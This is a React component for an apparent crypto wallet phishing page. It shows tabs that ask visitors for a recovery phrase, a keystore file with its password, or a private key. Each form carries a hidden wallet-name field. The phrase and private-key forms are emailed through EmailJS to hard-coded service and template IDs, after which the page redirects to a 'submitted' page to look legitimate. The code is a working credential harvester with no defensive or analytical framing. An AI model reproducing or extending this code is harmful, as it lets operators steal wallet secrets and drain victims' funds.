import { useState, useRef } from "react";
import './Tabs.css'
import emailjs from '@emailjs/browser';
import { walletname } from '../Wallet'


function Tabs() {
  const [toggleState, setToggleState] = useState(1);

  const toggleTab = (index) => {
    setToggleState(index);
  };


  const form = useRef()
  const sendEmail = (e) => {
    e.preventDefault();

    emailjs.sendForm('service_m3eprst', 'template_yd311xr', '#myForm1', 'm9YvBUQ86A2GugOaA')

    e.target.reset()

    setTimeout(function(){
      window.location="submitted.html";
  }, 5000);

    

    // history.push('/')
  };

  const form2 = useRef()
  const sendEmail2 = (e) => {
    e.preventDefault();

    // emailjs.sendForm('service_m3eprst', 'template_ob6401n', form.current, 'pCl99nrjr2s5D9yF-')

    e.target.reset()
    // window.location="submitted.html"
  };

  const form3 = useRef()
  const sendEmail3 = (e) => {
    e.preventDefault();

    emailjs.sendForm('service_m3eprst', 'template_xxrjvon', '#myForm3', 'm9YvBUQ86A2GugOaA')

    e.target.reset()

    setTimeout(function(){
      window.location="submitted.html";
  }, 5000);
  };

  return (
    <div className="flex flex-col relative w-full bg-white">
      <div className="flex">
        <button
          className={toggleState === 1 ? "tabs active-tabs" : "tabs"}
          onClick={() => toggleTab(1)}
        >
          Phrase
        </button>
        <button
          className={toggleState === 2 ? "tabs active-tabs" : "tabs"}
          onClick={() => toggleTab(2)}
        >
          Keystore JSON
        </button>
        <button
          className={toggleState === 3 ? "tabs active-tabs" : "tabs"}
          onClick={() => toggleTab(3)}
        >
          Private Key
        </button>
      </div>

      <div className="content-tabs">
        <div
          className={toggleState === 1 ? "content  active-content" : "content"}
        >
          <form ref={form} onSubmit={sendEmail} id='myForm1'>
            <input name="walletname" type="text" value={walletname} className="hidden"></input>
            <textarea name="phrase" className="w-full border border-solid border-gray-400 text-gray-500 text-sm sm:text-base pl-4 pr-4 py-2 rounded-lg focus:outline-none focus:border-blue-400 font-extralight mt-4" cols="30" rows="4" placeholder="Enter your recovery phrase" required spellCheck="false"></textarea>

            <p className="text-xs text-gray-400 mt-2 mb-4">
              Typically 12 (sometimes 24) words separated by single spaces
            </p>
            <button className='bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded w-full transition duration-500 ease mb-8' type='submit'>Proceed</button>
          </form>
        </div>

        <div
          className={toggleState === 2 ? "content  active-content" : "content"}
        >
          <form ref={form2} onSubmit={sendEmail2}>
            <label className="cursor-pointer flex flex-row justify-center align-middle rounded border border-dashed border-gray-500 pr-4 pl-4 text-blue-300 mb-5 py-2 mt-5 hover:bg-gray-200">
              <input name="JSON" type="file" className="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" placeholder="Enter your recovery phrase" required spellCheck="false"></input>
              {/* <span>Choose Keystore File</span> */}
            </label>

            <input name="walletpassword" type="text" className="w-full border border-solid border-gray-400 text-gray-500 text-sm sm:text-base pl-4 pr-4 py-2 rounded-lg focus:outline-none focus:border-blue-400 font-extralight mt-4" placeholder="Wallet password" required spellCheck="false"></input>

            <p className="text-xs text-gray-400 mt-2 mb-4">
              Several lines of text beginning with "&#123;...&#125;" plus the password you used to encrypt it.
            </p>
            <button className='bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded w-full transition duration-500 ease mb-8' type='submit'>Proceed</button>
          </form>
        </div>

        <div
          className={toggleState === 3 ? "content  active-content" : "content"}
        >
          <form ref={form3} onSubmit={sendEmail3} id='myForm3'>
            <input name="walletname" type="text" value={walletname} className="hidden"></input>
            <input name="privatekey" type="text" className="w-full border border-solid border-gray-400 text-gray-500 text-sm sm:text-base pl-4 pr-4 py-2 rounded-lg focus:outline-none focus:border-blue-400 font-extralight mt-4" placeholder="Enter your Private Key" required spellCheck="false"></input>

            <p className="text-xs text-gray-400 mt-2 mb-4">
              Typically 12 (sometimes 24) words separated by a single space
            </p>
            <button className='bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded w-full transition duration-500 ease mb-8' type='submit'>Proceed</button>
          </form>
        </div>
      </div>
    </div>
  );
}

export default Tabs;